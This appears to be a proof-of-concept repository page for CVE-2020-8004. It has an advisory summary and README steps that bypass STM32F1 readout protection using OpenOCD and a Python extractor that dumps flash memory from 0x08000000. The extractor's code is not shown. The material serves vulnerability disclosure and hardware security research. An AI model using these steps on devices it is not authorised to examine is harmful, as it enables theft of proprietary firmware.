CVE-2020-8004 PoC — STMicroelectronics STM32F1 Information Disclosure Vulnerability

Associated Vulnerability
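Title: STMicroelectronics STM32F1 Information Disclosure Vulnerability (CVE-2020-8004)
Description: STMicroelectronics STM32F1 is a 32-bit microcontroller based on the ARM Cortex M3, made by the Swiss company STMicroelectronics. An information disclosure vulnerability exists in STMicroelectronics STM32F1; it stems from incorrect access control. An attacker can exploit this vulnerability to obtain memory contents.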
Readme
## CVE-2020-8004
## Test
`$cd openocd-toolbox/scripts/linux/stm32f1x/`  
`$./lock.sh`  
`$./attach.sh`  
`($telnet localhost 4444)`  
`($reset halt)`  
`($mdw 0x08000000)`  
`$cd stm32f1-firmware-extractor`  
`$python3 main.py 0x08000000 512`

![test](https://github.com/wuxx/CVE-2020-8004/blob/master/doc/test.jpg)
![screenshot](https://github.com/wuxx/CVE-2020-8004/blob/master/doc/screenshot.png)
## References
- https://blog.zapb.de/stm32f1-exceptional-failure/
- https://gitlab.zapb.de/zapb/stm32f1-firmware-extractor/
- https://www.muselab-tech.com/cve-2020-8004-lou-dong-yuan-li-fen-xi/
- *The Definitive Guide to the ARM Cortex-M3*

File Snapshot

```
[4.0K] /data/pocs/c2f44a6135ae21dd7bdc8c98bf8235b7f0c83cbd
├── [4.0K] doc
│   ├── [ 39K] screenshot.png
│   └── [157K] test.jpg
├── [4.0K] openocd-toolbox
├── [ 623] README.md
└── [4.0K] stm32f1-firmware-extractor
    ├── [4.0K] firmware
    │   ├── [1.2K] main.c
    │   └── [2.0K] Makefile
    ├── [9.6K] main.py
    ├── [4.9K] openocd.py
    └── [6.2K] openocd.pyc

4 directories, 8 files
```